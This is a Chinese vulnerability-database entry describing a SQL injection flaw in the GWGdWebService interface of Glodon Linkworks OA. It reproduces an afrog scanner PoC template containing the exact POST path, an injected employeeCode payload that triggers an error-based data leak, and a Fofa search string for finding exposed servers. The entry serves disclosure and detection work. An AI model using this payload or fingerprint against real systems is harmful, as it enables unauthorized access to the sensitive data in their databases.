glodon-linkworks-gwgdwebservice-sqli: 广联达 Linkworks GWGdWebService SQL 注入

日期: 2025-09-01 | 影响软件: Glodon Linkworks GWGdWebService | POC: 已公开

漏洞描述

广联达 Linkworks办公OA GWGdWebService接口存在SQL注入漏洞,发送请求包后可以获取数据库中的敏感信息 Fofa: header="Services/Identification/login.ashx" || banner="Services/Identification/login.ashx"

PoC代码[已公开]

id: glodon-linkworks-gwgdwebservice-sqli

info:
  name: 广联达 Linkworks GWGdWebService SQL 注入
  author: zan8in
  severity: high
  verified: true
  description: |
    广联达 Linkworks办公OA GWGdWebService接口存在SQL注入漏洞,发送请求包后可以获取数据库中的敏感信息
    Fofa: header="Services/Identification/login.ashx" || banner="Services/Identification/login.ashx"
  reference:
    - https://github.com/zan8in/pocwiki/blob/main/%E5%B9%BF%E8%81%94%E8%BE%BE-linkworks-gwgdwebservice%E5%AD%98%E5%9C%A8SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md
  tags: glodon,sqli
  created: 2024/02/01

rules:
  r0:
    request:
      method: POST
      path: /Org/service/Service.asmx/GetUserByEmployeeCode
      body: employeeCode=1'-1/user--'&EncryptData=1
    expression: response.status == 500 && response.body.bcontains(b'在将 nvarchar 值') && response.body.bcontains(b'转换成数据类型 int 时失败')
expression: r0()
来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/vulnerability/glodon-linkworks-gwgdwebservice-sqli.yaml

相关漏洞推荐